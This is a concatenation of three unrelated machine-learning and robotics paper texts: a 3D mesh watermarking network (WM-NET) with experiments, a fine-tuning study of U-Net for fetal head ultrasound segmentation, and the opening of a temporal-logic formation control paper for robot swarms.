We train the autoencoder in a way that the decoder can recover \(M\) from the noised latent code \(\hat{z}\). We choose NECST [4], a learnable channel coding method, as our message autoencoder. Our message autoencoder is trained independently from the entire watermarking model. ### Training and Losses We achieve the objective in Eq 4 using three losses: encoding loss \(L_{enc}\), reconstruction loss \(L_{dec}\), and discriminative loss \(L_{dis}\). Formally: \[\begin{split}\phi^{*},\theta^{*}=\\ \operatorname*{arg\,min}_{\phi,\theta}&(\lambda_{ enc}L_{enc}(\phi,\theta)+\lambda_{dec}L_{dec}(\phi,\theta)+\lambda_{dis}L_{dis}( \phi,\theta))\end{split} \tag{6}\] where \(\lambda_{enc},\lambda_{dec},\lambda_{dis}\) are weight factors. Both \(L_{enc},L_{dis}\) encourage generated \(\hat{V}\) indistinguishable from \(V\). For \(L_{enc}\), we use both the L2 norm and infinite norm of geometry difference to penalize the distortion: \[L_{enc}=\frac{1}{N_{v}}\sum_{i}^{N_{v}}(V[i]-\hat{V}[i])^{2}+\max_{i}\{V[i]- \hat{V}[i]\} \tag{7}\] For \(L_{dis}\), we use part of sigmoid cross entropy loss: \[L_{dis}=\log(1-\sigma(\mathbf{A}(\hat{V}))) \tag{8}\] We apply standard sigmoid cross entropy loss to encourage precise message reconstruction: \[\begin{split}& L_{dec}=\\ &\frac{\sum_{i}^{N_{m}}(M[i]\cdot\log\sigma(\hat{M}[i])+(1-M[i]) \cdot\log(1-\sigma(\hat{M}[i])))}{N_{m}}\end{split} \tag{9}\] The final message bits are computed from the following equation: \[M_{final}=clamp(sign(\hat{M}-0.5),0,1) \tag{10}\] ## 5 Experiment ### Setup **Network Configurations and Parameters.** Our WM-NET uses the convolution operator in Section 4.1 to build \(\mathbf{E}\), \(\mathbf{D}\) and \(\mathbf{A}\), where channel size are all 64. At the first layer, we take coordinates \((x,y,z)\) as the feature of points, i.e., \(C_{v}=3\). We trained our WM-NET under settings of different message lengths \(N_{m}=8,16,32,48\). During training, we set \(\lambda_{enc}=2,\lambda_{dec}=1,\lambda_{dis}=0.001\) under the settings of 8-bit message lengths, and we set \(\mu=0\), \(\sigma=0.01\), \(\alpha\in[0,\pi)\), \(s\in[0.1,1)\). **Baselines.** We compare the existing DNN-based watermarking methods [54, 47]. [47] embeds the secret message in vertex distributions. [54] embeds the secret message in both vertex distributions and texture distributions but fails to verify the watermark without texture assistance. We compare [54] with its texture assistance and show that Figure 5: WM-NET overview. Message encoder first maps message \(M\) into latent code \(z\), which is further fed to the watermark encoder \(\mathbf{E}\) along with the input mesh \(G\) to generate the encoded mesh \(\hat{G}\). The attack layer generates a noised mesh \(G_{adv}\). Given the noised mesh, the watermark decoder \(\mathbf{D}\) produces the decoded latent code \(\hat{z}\) followed by the message decoder, which decodes latent code into decoded message \(\hat{M}\). The adversarial discriminator encourages minimizing the difference between \(G\) and \(\hat{G}\). our method achieves similar effectiveness without the texture assistance. **Metrics.** To evaluate the extracted message accuracy, we use average bit accuracy. To evaluate geometry distortion, we use Hausdorff distance and the L1 norm of vertex Normal (L1 Normal) to evaluate geometry difference. Hausdorff distance was commonly used in 3D reconstruction tasks and one of our baselines [47], and L1 Normal was used in [54]. 
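As a concrete reference for the convolution operator of Section 4.1 that builds \(\mathbf{E}\), \(\mathbf{D}\), and \(\mathbf{A}\), the PyTorch sketch below implements one layer of Eq. (5): an MLP standing in for \(W_{\Theta}\) maps each relation \(D(v_{j},v_{i})\) to a linear transform of the neighbor feature, and the transformed features are averaged over \(\mathcal{N}(v_{i})\). The edge-index layout, hidden width, and the exact parameterization of \(W_{\Theta}\) are our assumptions for illustration; the paper does not spell out these implementation details.

```python
import torch
import torch.nn as nn

class RelationConv(nn.Module):
    """One layer of the relation-conditioned graph convolution in Eq. (5)."""
    def __init__(self, in_dim, out_dim, coord_dim=3, hidden=64):
        super().__init__()
        # W_Theta: maps the relation D(v_j, v_i) to an (in_dim x out_dim)
        # linear transform that is applied to the neighbor feature F_{v_j}.
        self.w_theta = nn.Sequential(
            nn.Linear(coord_dim, hidden), nn.ReLU(),
            nn.Linear(hidden, in_dim * out_dim),
        )
        self.in_dim, self.out_dim = in_dim, out_dim

    def forward(self, feats, coords, edge_index):
        # feats: (N, in_dim) vertex features; coords: (N, 3) coordinates;
        # edge_index: (2, E) pairs (neighbor j, center i), self-loops included.
        src, dst = edge_index
        rel = coords[src] - coords[dst]                           # D(v_j, v_i)
        w = self.w_theta(rel).view(-1, self.in_dim, self.out_dim)
        msg = torch.bmm(feats[src].unsqueeze(1), w).squeeze(1)    # F_{v_j} W_Theta(.)
        out = feats.new_zeros(feats.size(0), self.out_dim)
        out.index_add_(0, dst, msg)                               # sum over N(v_i)
        deg = feats.new_zeros(feats.size(0))
        deg.index_add_(0, dst, torch.ones(dst.size(0), dtype=feats.dtype,
                                          device=feats.device))
        return out / deg.clamp(min=1).unsqueeze(-1)               # 1/|N(v_i)| average
```

Stacking a few such layers with 64 channels, as in the setup above, would give the shared backbone used by the encoder, decoder, and discriminator.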
### Dataset Our WM-NET is trained on a limited train set derived from ModelNet40 [51] and then tested on the entire test set of ModelNet40 as well as other datasets such as ShapeNet [3], GraspNet [8], ScanNet [5], and Hands [32]. For all datasets, we normalize the vertex coordinates \((x,y,z)\) to \([-1,1]\) while keeping the ratio between width, height, and depth before meshes are fed into the network. We acquire limited data through simplification using CGAL [42], which performs edge-collapse or half-edge-collapse algorithms to reduce the number of triangles by merging vertices. We generated two train sets, _m500_ and _m2500_, in which the numbers of vertices are \(N_{v}=500\) and \(N_{v}=2500\), respectively. For _m2500_, we manually filter out meshes whose \(N_{v}\) is originally less than 2500 and those with low quality after simplification; we perform the same process for _m500_. As a result, we get 3508 train meshes and 879 test meshes for _m2500_, and 1147 train meshes and 337 test meshes for _m500_. The original ModelNet has 9843 and 2468 meshes for training and testing. We train two replicas of WM-NET on _m500_ and _m2500_, respectively. Both are further tested on the entire test set of ModelNet to evaluate size adaptation. To evaluate geometry adaptation, the two replicas of WM-NET trained on _m500_ and _m2500_ are tested on ShapeNet, GraspNet, ScanNet, and Hands. ShapeNet has categories of meshes different from ModelNet, such as birdhouse, camera, and clock. ScanNet is a dataset of scanned and reconstructed real-world scenes. Hands contains meshes of human hands. ### Effectiveness **Distortion vs. Accuracy.** Figure 6 shows the results of our watermark. Table 2 shows the trade-off between distortions and bit accuracy: we conduct experiments with varied \(\lambda_{enc},\lambda_{dec}\) while setting \(\lambda_{dis}=0.001\), and higher bit accuracy results in higher L1 geometry differences. **Robustness Under Attack.** We consider (1) Gaussian noise, (2) translation, (3) rotation, (4) scaling, and (5) cropping attacks. Table 3 shows the robustness of our method against these attacks. It is worth noting that we still achieve 65.81% bit accuracy under 90% cropping attacks; in such a case, we can still claim ownership of the cropped mesh. More details about the experiments are discussed in the supplementary material. Figure 6: Results showing the imperceptible watermarking: (a) visualization of the L1 norm of vertex normal distortions, (b) the original mesh, and (c) the watermarked mesh with WM-NET (ours). **Comparison to Previous Work.** Embedding in vertex distributions is more secure because it is agnostic to changes in texture images. We compare our WM-NET with the texture-based method [54] and the 3D-domain method [47]. In the setting of 8-bit binary messages, our method achieves 10% higher bit accuracy while introducing 50% fewer distortions. Note that watermarking without the assistance of texture is harder; nevertheless, our method still achieves similar distortions and accuracy compared with the texture-based method [54]. The adaptation is tested under the following settings. We train WM-NET on _m500_ and _m2500_ to get two replicas. Both are further evaluated on the original test set of ModelNet40, ShapeNet, ScanNet, GraspNet, and Hands; the data distributions in ShapeNet, ScanNet, GraspNet, and Hands are all unseen to both WM-NET replicas during training. Figure 8 shows the result using the WM-NET trained on _m2500_. 
The top row shows the cover meshes where (a-d) are simplified from the original mesh (e). The bottom row shows the watermarked meshes. Table 6 shows statistical results under size variations. We evaluate our method on meshes with \(N_{v}\leq 100000\). For the WM-NET trained on _m2500_, it is still effective when mesh size is 40\(\times\) increased. Comparing to the WM-NET trained on _m2500_, the one trained on _m500_ achieves lower accuracy and intro \begin{table} \begin{tabular}{c|c|c|c|c} \hline \hline \(N_{m}\) & Method & Hausdorff & L1 Normal & Acc \\ \hline \hline \multirow{3}{*}{8} & Yoo _et al._[54] & / & **0.1041** & 0.9362 \\ \cline{2-5} & Wang _et al._[47] & 0.1495 & 0.2277 & 0.8512 \\ \cline{2-5} & WM-NET & **0.0433** & 0.1143 & **0.9403** \\ \hline \multirow{3}{*}{16} & Yoo _et al._[54] & / & / & 0.8000 \\ \cline{2-5} & Wang _et al._[47] & 0.2770 & 0.5028 & 0.8041 \\ \cline{2-5} & WM-NET & **0.0765** & **0.2241** & **0.8772** \\ \hline \multirow{3}{*}{32} & Yoo _et al._[54] & / & / & 0.6441 \\ \cline{2-5} & Wang _et al._[47] & 0.2227 & 0.4016 & 0.5324 \\ \cline{1-1} \cline{2-5} & WM-NET & **0.0869** & **0.3504** & **0.7087** \\ \hline \multirow{3}{*}{48} & Yoo _et al._[54] & / & / & 0.5905 \\ \cline{1-1} \cline{2-5} & Wang _et al._[47] & 0.3149 & 0.6630 & 0.5960 \\ \cline{1-1} \cline{2-5} & WM-NET & **0.0654** & **0.3668** & **0.6321** \\ \hline \hline \end{tabular} \end{table} Table 4: Comparison to previous work. \begin{table} \begin{tabular}{c c|c|c|c} \hline \hline Parameters & \multicolumn{2}{c|}{Distortion} & \multirow{2}{*}{Acc} \\ \hline \(\lambda_{enc}\) & \(\lambda_{dec}\) & Hausdorff & L1 Normal & \\ \hline 1 & 2 & 0.0636 & 0.2379 & **0.9891** \\ 2 & 1 & 0.0505 & 0.1482 & 0.9659 \\ 3 & 1 & 0.1001 & 0.1142 & 0.9603 \\ 5 & 1 & 0.0433 & 0.1143 & 0.9403 \\ 10 & 1 & **0.0309** & **0.0666** & 0.7609 \\ \hline \hline \end{tabular} \end{table} Table 2: We fix \(\lambda_{dis}=0.001\) and vary \(\lambda_{enc}\)\(\lambda_{dec}\) to show a trade-off relationship between distortions and bit accuracy. Figure 7: t-SNE [45] visualization of latent feature. To show the geometry adaptation, we visualize latent features of 6 unseen categories of meshes. We label their latent feature with (a) the embedded message and (b) their categories. (a) shows that the meshes embedded with different messages are separated in latent space. (b) shows that the distributions of different categories are entangled once they are embedded with the same messages. duces more distortions. However, it still achieves 79.02% accuracy when the mesh size is 190\(\times\) increased. Table 6 shows results under geometry variations on ShapeNet. On ShapeNet, the WM-NET trained on _m2500_ achieves 93.48% bit accuracy on average while only introducing 0.1854 L1 distortions to vertex normal and 0.0549 Hausdorff distortions. The results demonstrate the statement in Section 4.1 that simplified meshes inherit the relation \(D(v_{i},v_{j})\) distribution from the original meshes. However, as the size of training meshes decreases, the adaptation of GAT decreases as well. ### Ablation Study We evaluate our WM-NET with the downsampling and upsampling process as in [56] and without the attack layer. Table 8 shows that our method is less robust to rotation attacks without the attack layer, and it is harmful to involve the upsampling and downsampling process in watermarking. We also measure secrecy by training an additional binary classifier to distinguish between the cover and watermark meshes. 
We use \(\mathbf{A}\) and a PointNet-based classifier to distinguish watermarked meshes from the original ones. Table 9 shows that both classifiers can finally make over 90% detection accuracy through overfitting on the train set but only have 50% detection accuracy over the validation set. This shows that training a binary classifier to distinguish watermarked meshes from cover meshes is not applicable. \begin{table} \begin{tabular}{c|c|c|c|c|c|c|c} \hline & Metrics & \((0,20000)\) & \([20000,40000)\) & \([40000,60000)\) & \([60000,80000)\) & \([80000,100000)\) \\ \hline \hline \multirow{3}{*}{_m500_} & Hausdorff & 0.1172 & 0.0972 & 0.0924 & 0.0921 & 0.0939 \\ & L1 Normal & 0.1851 & 0.2003 & 0.2214 & 0.2274 & 0.2452 \\ & Acc & 0.9386 & 0.8731 & 0.8482 & 0.8305 & 0.7902 \\ \hline \multirow{3}{*}{_m2500_} & Hausdorff & 0.0611 & 0.0544 & 0.0535 & 0.0529 & 0.0548 \\ & L1 Normal & 0.1989 & 0.1476 & 0.1599 & 0.1605 & 0.1647 \\ \cline{1-1} & Acc & 0.9462 & 0.9034 & 0.9183 & 0.9123 & 0.8708 \\ \hline \hline \end{tabular} \end{table} Table 6: Size adaptation on ModelNet dataset with the varied number of vertices \(N_{v}\in(0,100000]\). _m500_ and _m2500_ are trained on simplified ModelNet dataset with \(N_{v}=500\) and \(N_{v}=2500\), respectively. \begin{table} \begin{tabular}{c|c|c|c} \hline & Effectiveness & Adaptation & Rotation \\ \hline \hline original & **0.9814** & 0.9102 & **0.9684** \\ sampling & 0.6048 & 0.6053 & 0.5103 \\ w/o attack & 0.9781 & **0.9213** & 0.5612 \\ \hline \hline \end{tabular} \end{table} Table 8: WM-NET ablation study. We report bit accuracy for models trained with original settings (original), downsample-upsample (sampling), and without the attack layer (w/o attack). \begin{table} \begin{tabular}{c|c|c c c c c c c c c} \hline & Metrics & Avg & birdhouse & camera & clock & spigot & knife & loudspeaker & mug & pistol & printer \\ \hline \hline \multirow{3}{*}{_m500_} & Hausdorff & 0.0958 & 0.0978 & 0.0923 & 0.1054 & 0.0862 & 0.0547 & 0.1060 & 0.0982 & 0.0809 & 0.0994 \\ & L1 Normal & 0.1808 & 0.1649 & 0.1439 & 0.1576 & 0.1464 & 0.1355 & 0.1521 & 0.1213 & 0.1580 & 0.2033 \\ & Acc & 0.8863 & 0.8698 & 0.9347 & 0.9220 & 0.7943 & 0.7160 & 0.9221 & 0.8615 & 0.8969 & 0.9390 \\ \hline \multirow{3}{*}{_m2500_} & Hausdorff & 0.0549 & 0.0680 & 0.0568 & 0.0570 & 0.0474 & 0.0493 & 0.0620 & 0.0527 & 0.0562 & 0.0547 \\ & L1 Normal & 0.1854 & 0.2091 & 0.1599 & 0.1608 & 0.1479 & 0.1722 & 0.1758 & 0.1266 & 0.1767 & 0.1800 \\ \cline{1-1} & Acc & 0.9348 & 0.9554 & 0.9800 & 0.9489 & 0.9358 & 0.8773 & 0.9682 & 0.9526 & 0.9324 & 0.9623 \\ \hline \hline \end{tabular} \end{table} Table 5: Geometry adaptation on ShapeNet dataset. _m500_ and _m2500_ are trained on simplified ModelNet dataset with \(N_{v}=500\) and \(N_{v}=2500\), respectively. \begin{table} \begin{tabular}{c|c|c|c} \hline & Effectiveness & Adaptation & Rotation \\ \hline \hline original & **0.9814** & 0.9102 & **0.9684** \\ sampling & 0.6048 & 0.6053 & 0.5103 \\ w/o attack & 0.9781 & **0.9213** & 0.5612 \\ \hline \hline \end{tabular} \end{table} Table 9: The detection rate when distinguishing \(G\) and \(\hat{G}\). ## 6 Conclusion 3D watermarking is a key step toward copyright protection. Our paper has introduced WM-NET, which utilizes graph attention networks to embed binary messages in vertex distributions without texture assistance. Our approach has taken advantage of the property that simplified meshes inherit similar relations from the original ones, specifically the offset vector between adjacent vertices. 
This approach has enabled training on simplified meshes while remaining effective on larger meshes and on previously unseen categories of meshes (size and geometry adaptation), resulting in 50% fewer distortions and 10% higher bit accuracy than previous methods. Moreover, extensive experiments have shown that our WM-NET is robust against various mesh attacks, such as Gaussian noise, rotation, translation, scaling, and cropping.
2307.09067
Evaluate Fine-tuning Strategies for Fetal Head Ultrasound Image Segmentation with U-Net
Fetal head segmentation is a crucial step in measuring the fetal head circumference (HC) during gestation, an important biometric in obstetrics for monitoring fetal growth. However, manual biometry generation is time-consuming and results in inconsistent accuracy. To address this issue, convolutional neural network (CNN) models have been utilized to improve the efficiency of medical biometry. But training a CNN network from scratch is a challenging task, we proposed a Transfer Learning (TL) method. Our approach involves fine-tuning (FT) a U-Net network with a lightweight MobileNet as the encoder to perform segmentation on a set of fetal head ultrasound (US) images with limited effort. This method addresses the challenges associated with training a CNN network from scratch. It suggests that our proposed FT strategy yields segmentation performance that is comparable when trained with a reduced number of parameters by 85.8%. And our proposed FT strategy outperforms other strategies with smaller trainable parameter sizes below 4.4 million. Thus, we contend that it can serve as a dependable FT approach for reducing the size of models in medical image analysis. Our key findings highlight the importance of the balance between model performance and size in developing Artificial Intelligence (AI) applications by TL methods. Code is available at https://github.com/13204942/FT_Methods_for_Fetal_Head_Segmentation.
Fangyijie Wang, Guénolé Silvestre, Kathleen M. Curran
2023-07-18T08:37:58Z
http://arxiv.org/abs/2307.09067v2
# Evaluate Fine-tuning Strategies for Fetal Head Ultrasound Image Segmentation with U-Net ###### Abstract Fetal head segmentation is a crucial step in measuring the fetal head circumference (HC) during gestation, an important biometric in obstetrics for monitoring fetal growth. However, manual biometry generation is time-consuming and results in inconsistent accuracy. To address this issue, convolutional neural network (CNN) models have been utilized to improve the efficiency of medical biometry. But training a CNN network from scratch is a challenging task, we proposed a Transfer Learning (TL) method. Our approach involves fine-tuning (FT) a U-Net network with a lightweight MobileNet as the encoder to perform segmentation on a set of fetal head ultrasound (US) images with limited effort. This method addresses the challenges associated with training a CNN network from scratch. It suggests that our proposed FT strategy yields segmentation performance that is comparable when trained with a reduced number of parameters by 85.8%. And our proposed FT strategy outperforms other strategies with smaller trainable parameter sizes below 4.4 million. Thus, we contend that it can serve as a dependable FT approach for reducing the size of models in medical image analysis. Our key findings highlight the importance of the balance between model performance and size in developing Artificial Intelligence (AI) applications by TL methods. Code is available at [https://github.com/13204942/FT_Methods_for_Fetal_Head_Segmentation](https://github.com/13204942/FT_Methods_for_Fetal_Head_Segmentation). **Keywords:** Medical Imaging, Transfer Learning, Ultrasound, Biometry, Convolutional Neural Network. ## 1 Introduction Training a deep CNN from scratch can prove to be a formidable undertaking, particularly in medical applications that are often constrained by limited annotated data and require a substantial time investment. However, Transfer Learning (TL) can help alleviate these challenges. TL is a technique in which a network learns from a large dataset and then applies that knowledge to another application, typically a smaller dataset. This approach can be especially advantageous in medical applications where annotated data is scarce, as it permits the utilization of pre-trained models to enhance performance on smaller datasets. TL approaches entail the adoption of pre-trained models and fine tuning (FT). In this study, we conducted a segmentation task on fetal head US images using deep neural networks with various FT strategies. The dataset HC18 comprises of 1334 ultrasound images obtained from 551 pregnant women and is publicly available [22]. To perform semantic segmentation on the HC18 fetal head US images, we performed the FT of the U-Net [14] network, with a pre-trained MobileNet [15] as its backbone. In order to develop a lightweight model using FT techniques, this research work considered a comparison of model sizes for various pre-trained CNN models. Furthermore, we investigated the impact of FT on different decoder layers for fetal head segmentation. In terms of segmentation outcomes on tests, the results were competitive in comparison to the state-of-the-art (SOTA) results, 97% (\(\pm\) 0.3%) achieved by [1] with FT the encoder. Our research is of significance when analyzing the trade-off between performance and model size in the development of mobile AI applications. 
The main contributions of this paper are as follows: (1) We analyzed eight different fine-tuning strategies on a U-Net network that used a MobileNet V2 encoder to predict segmentation masks from a fetal head ultrasound dataset. (2) We achieved SOTA accuracy on the HC18 Grand Challenge by providing a pre-trained U-Net model that had only 4.4 million trainable parameters. (3) Our experiments showed that unfreezing the decoder of a pre-trained U-Net network was the most effective fine-tuning strategy compared to the others we tested. ## 2 Related Work In recent years, DL techniques have been developed to achieve high precision outcomes in semantic segmentation tasks. Ronneberger et al. [14] proposed the U-Net architecture to perform biomedical image segmentation tasks with annotated samples more efficiently. In 2019, Howard et al. [13] constructed MobileNet V2 for semantic segmentation by making use of lightweight depth-wise separable convolutions to filter features. Therefore, it has a lower computational cost, less memory, and consumes less power. As a result, MobileNet V2 is a low-cost, efficient deep neural network suitable for mobile and embedded vision applications. In terms of US image segmentation tasks, [1] employs TL techniques to overcome limited and costly data issues in DL for medical applications. The authors investigate the impact of FT various layers of a pre-trained U-Net and assess their performance in fetal US image segmentation tasks on the HC18 US dataset. Their FT strategies consist of three schemes, FT shallow, deep layers, and the entire network. Across all US datasets analyzed in their work, FT the entire pre-trained U-Net yielded better results than training from scratch. [1] utilizes cross-domain TL with U-Net architecture for precise and fast image segmentation. The cross-domain TL techniques are utilized in [15] for the purpose of fetal head segmentation on HC18. The researchers have proposed a speedy and efficient method to produce a considerable number of annotated US images, based on a limited number of manually annotated biometrics. Besides cross-domain TL techniques, Alzubaidi et al. [1] demonstrated an ensemble TL technique with a segmentation model that includes eight CNN models. This technique is evaluated on the US dataset HC18 by achieving 98.53% mIoU. However, the ensemble TL model has 28.12 million trainable parameters, which is 7 times more than the best model we proposed with 4.4 million trainable parameters. [12] provides an overview study of TL methods on medical image classification. They demonstrated the efficacy of TL. The authors suggest that utilizing CNN models as feature extractors can save computational costs. Inspired by the investigation from [12], we think similar FT methods can be utilized in medical image segmentation. Our proposed FT strategy achieved competitive head segmentation results on HC18 with fewer trainable parameters and training epochs compared to existing SOTA methods, see Figure 0(b). The U-Net is a strong CNN architecture widely applied in medical image analysis. The most notable segmentation outcomes on the present HC18 leaderboard were obtained by leveraging U-Net and its expansion networks. Hence, we utilize U-Net architecture to construct a CNN model and evaluate our FT strategies. ## 3 Methodology **Data Preparation:** The HC18 dataset comprises a two-dimensional (2D) US image collection that has been split into 999 images for training purposes and 335 images for testing. 
All HC18 images are standard planes suitable for measuring fetal HC, and each image has dimensions of 800 by 540 pixels. Because these 999 images were annotated with biometrics by experienced medical experts, they were selected as the experimental dataset, whereby 799 images and 200 images were assigned for training and testing, respectively. All 999 images were resized to 512 x 512 pixels. In this study, we used standard data-augmentation techniques: rotation by an angle from [\(-25^{\circ}\),\(25^{\circ}\)], horizontal flipping, vertical flipping, and pixel normalization. **Model Design:** In our work, based on Ronneberger's work [14], we built a U-Net baseline model with 4 encoder layers, 4 decoder layers and 1 bottleneck. The model has input features [10, 12, 15, 51]. We apply a MobileNet V2 model to the U-Net's encoder part; the MobileNet V2 model was pre-trained on the ImageNet dataset. **Fine-tuning Strategies:** Our FT methods comprise seven distinct schemes, see Figure 0(a). In the baseline U-Net model, the encoder is not pre-trained and all layers remain unfrozen. The FT schemes are: training the entire decoder, training the entire encoder, and training only layer 0, layers 0 to 1, layers 0 to 2, layers 2 to 4, or layer 4 within the decoder. In all experiments, the training and testing operations are each repeated four times. **Training and Evaluation:** We implemented all of our experiments using PyTorch. After comparing performance between different CNN architectures, we train a U-Net model on HC18 from scratch by using Segmentation Models [1]. We trained the U-Net model from scratch for 20 epochs, where each epoch took around 75 seconds. We also fine-tuned the pre-trained U-Net with the MobileNet V2 encoder for 20 epochs, where each epoch took around 25 seconds. The training and test datasets both use a batch size of 10. The Adam optimiser was used in all training processes with a decaying learning rate of \(1e-4\), and all training was performed on an NVIDIA Tesla T4 graphics card. The typical metrics applied to evaluate the performance of segmentation models are Pixel Accuracy (PA), the Dice coefficient, and Mean Intersection over Union (IoU); Mean IoU is defined as the average IoU over all classes \(K\). ## 4 Experimental Results Figure 0(c) summarises the segmentation metrics achieved by the various FT strategies on the HC18 test set of 200 fetal US images. Unfreezing the entire decoder of the pre-trained U-Net yields more accurate segmentation masks than both the U-Net baseline and the other FT strategies. Our proposed FT strategy improved PA, Dice score, and mIoU by 0.45%, 0.75%, and 1.4%, respectively, compared to training our U-Net baseline from scratch, while the number of trainable parameters was reduced by 85.8%. Although the other FT strategies have fewer than 4.4 million trainable parameters, our proposed FT strategy outperforms them. 
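To make the winning configuration concrete, the sketch below freezes the ImageNet-pretrained MobileNet V2 encoder and leaves the decoder (and segmentation head) trainable. It assumes the Segmentation Models package mentioned above is segmentation_models_pytorch and uses its convention that encoder parameters carry an `encoder.` name prefix; the exact trainable-parameter count depends on the decoder configuration, so treat the printed figure as approximate rather than as the 4.4 million reported above.

```python
import segmentation_models_pytorch as smp

# U-Net with a lightweight, ImageNet-pretrained MobileNet V2 encoder.
model = smp.Unet(
    encoder_name="mobilenet_v2",
    encoder_weights="imagenet",
    in_channels=1,     # grayscale ultrasound
    classes=1,         # binary fetal-head mask
)

# Proposed strategy: freeze the encoder, fine-tune all decoder layers (+ head).
for name, param in model.named_parameters():
    param.requires_grad = not name.startswith("encoder.")

trainable = sum(p.numel() for p in model.parameters() if p.requires_grad)
print(f"trainable parameters: {trainable / 1e6:.1f} M")
```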
Compared to Amiri's method [1], our proposed FT strategy also improves on their reported Dice score (95.1%) by 1.24%. Another FT strategy, training only the pre-trained encoder of the U-Net, also shows competitive results with a 96.22% Dice score. ## 5 Conclusion We presented an FT strategy for a pre-trained U-Net that enables accurate fetal head segmentation in US images while utilizing only 4.4 million trainable parameters. To evaluate the effectiveness of various fine-tuning approaches, we conducted experiments on the HC18 Grand Challenge dataset. Our findings suggest that utilizing a pre-existing network enhances segmentation precision, whereas augmenting the number of trainable parameters does not significantly impact accuracy. To reduce model size and the number of trainable parameters, we used the MobileNet V2 model as the encoder in our U-Net. Our fine-tuned model reduces the number of trainable parameters by 85.8% compared with training a randomly initialized U-Net. Based on our experiments, the ideal approach for FT is to adjust layers 0 to 4 of the decoder of the pre-trained U-Net; this methodology yielded a PA of 97.77%, a Dice coefficient of 96.28%, and an mIoU of 92.87% on the HC18 test dataset. Alternatively, fine-tuning only the pre-trained encoder of the U-Net is another TL method that can potentially produce competitive results. Our findings suggest that adjusting the decoder of the U-Net can serve as an efficient approach for fine-tuning small models in US image analysis. Figure 1: (a) The first row shows three fine-tuning strategies: U-Net baseline, 0 to 4 layers remain unfrozen within the decoder, and the encoder remains unfrozen. The second row shows three fine-tuning strategies: layer 0 remains unfrozen within the decoder, layers 0 to 1 remain unfrozen within the decoder, and layers 0 to 2 remain unfrozen within the decoder. The last row shows two fine-tuning strategies: layers 2 to 4 remain unfrozen within the decoder, and layer 4 remains unfrozen within the decoder. (b) Comparison of our methods with the SOTA methods. (c) Comparison of Pixel Accuracy, Dice Score, and mIoU on the test data set. Mobilenet_v2\(*\) is the encoder with random weights. ## 6 Future Work Future research may be conducted to reduce noise in US images by introducing image processing methods, and we will further investigate the resilience of models trained with TL techniques. Furthermore, we intend to investigate alternative pre-trained models in order to achieve an optimized model that is smaller in size. ## Acknowledgments This publication has emanated from research conducted with the financial support of Science Foundation Ireland under Grant number 18/CRT/6183. For the purpose of Open Access, the author has applied a CC BY public copyright licence to any Author Accepted Manuscript version arising from this submission.
2304.00275
Automated Formation Control Synthesis from Temporal Logic Specifications
In many practical scenarios, multi-robot systems are envisioned to support humans in executing complicated tasks within structured environments, such as search-and-rescue tasks. We propose a framework for a multi-robot swarm to fulfill complex tasks represented by temporal logic specifications. Given temporal logic specifications on the swarm formation and navigation, we develop a controller with runtime safety and convergence guarantees that drive the swarm to formally satisfy the specification. In addition, the synthesized controller will autonomously switch formations as necessary and react to uncontrollable events from the environment. The efficacy of the proposed framework is validated with a simulation study on the navigation of multiple quadrotor robots.
Shuhao Qi, Zengjie Zhang, Sofie Haesaert, Zhiyong Sun
2023-04-01T09:43:23Z
http://arxiv.org/abs/2304.00275v3
# Automated Formation Control Synthesis from Temporal Logic Specifications ###### Abstract In this paper, we propose a novel framework using formal methods to synthesize a navigation control strategy for a multi-robot swarm system with automated formation. The main objective of the problem is to navigate the robot swarm toward a goal position while passing a series of waypoints. The formation of the robot swarm should be changed according to the terrain restrictions around the corresponding waypoint. Also, the motion of the robots should always satisfy certain runtime safety requirements, such as avoiding collision with other robots and obstacles. We prescribe the desired waypoints and formation for the robot swarm using a temporal logic (TL) specification. Then, we formulate the transition of the waypoints and the formation as a deterministic finite transition system (DFTS) and synthesize a control strategy subject to the TL specification. Meanwhile, the runtime safety requirements are encoded using control barrier functions, and fixed-time control Lyapunov functions ensure fixed-time convergence. A quadratic program (QP) problem is solved to refine the DFTS control strategy to generate the control inputs for the robots, such that both TL specifications and runtime safety requirements are satisfied simultaneously. This work enlights a novel solution for multi-robot systems with complicated task specifications. The efficacy of the proposed framework is validated with a simulation study. ## I Introduction Nowadays, robots are required to accomplish more complicated tasks which should not only satisfy high-level task specifications but also ensure runtime safety requirements [1, 2]. Taking robot search and rescue as an example, the robots need to achieve a series of objectives, including locating the survivors, navigating to the rescue spots, and transporting the survivors to a designated safe zone [3]. The specification of the task may be multi-perspective or comprehensive. For example, the robots may be required to follow certain formations while moving toward the rescue spot. This means that the task specifications of the robot systems should be defined on multiple domains. Apart from the task specifications, multi-agent system control also needs to satisfy certain runtime safety requirements [4], such as collision avoidance with other robots and obstacles. Ensuring the satisfaction of both task specifications and runtime safety requirements is a valuable and interesting topic for the control of multi-agent systems. The task specifications of robotic systems are commonly described using temporal logic (TL) formulas [5] which are effective tools to describe the spatiotemporal constraints to prescribe the desired behavior of the system. The basic approach to synthesizing a controller for a dynamic system subject to a TL specification is the model-checking-based method that abstracts a deterministic finite transition system (DFTS) out of the original system and computes a symbolic controller by solving a game over the product of the DFTS and the automaton transformed from the TL specifications [6]. Then, the system controller can be solved by refining the symbolic controller [7]. Model-checking-based methods are commonly used for the control problems of multi-agent systems in which the tasks are specified using linear temporal logic (LTL) formulas [8, 9]. 
Also, optimization-based approaches are used to solve the control problems for multi-agent systems with signal temporal logic (STL) specifications, where the controller is obtained by solving a mixed-integer linear programming (MILP) problem [10]. STL specifications are also widely used for the control of multi-agent systems and solved by various methods, such as model predictive control [11], control barrier function [12], and funnel functions [13]. TL specifications are used for robot swarm systems for the design of controller [14] and communication strategies [15]. The runtime safety requirements of a dynamic system can be efficiently encoded using control barrier functions (CBF). It ensures the strict satisfaction of state-dependent constraints for dynamic systems by imposing the set invariance property [16]. A CBF is a Lyapunov-like function that can conveniently generate closed-form controllers that ensure safety without massive computation. Meanwhile, optimization-based methods like quadratic programming (QP) are also used together with CBF and CLF constraints to balance the system performance and the safety requirements [17]. Moreover, the CBF-QP formulation is extended to ensure collision-free behaviors in multi-robot systems [18]. Among the existing work, the variants of CBF and CLF considering temporal properties attract much attentions [19, 20], which are promising to solve problems with spatiotemporal constraints. Fixed-time [21] control Lyapunov function (CLF) and CBF are unified in the QP formulation to ensure fixed-time convergence and safety. Since the stability related to temporal property is guaranteed in these works, they are promising to solve the high-level missions specified by TL formulas. In [22], a method is proposed to automatically translate TL specifications into a CBF-QP problem to solve controllers for multi-robot swarm systems, which provides an example of incorporating task specifications and runtime safety requirements simultaneously in control synthesis. In this paper, we propose a novel framework to solve complicated autonomous navigation problems for multi-robot swarm systems with automated formation specified by LTL formulas. The navigation task has multiple objectives. Firstly, the robot swarm 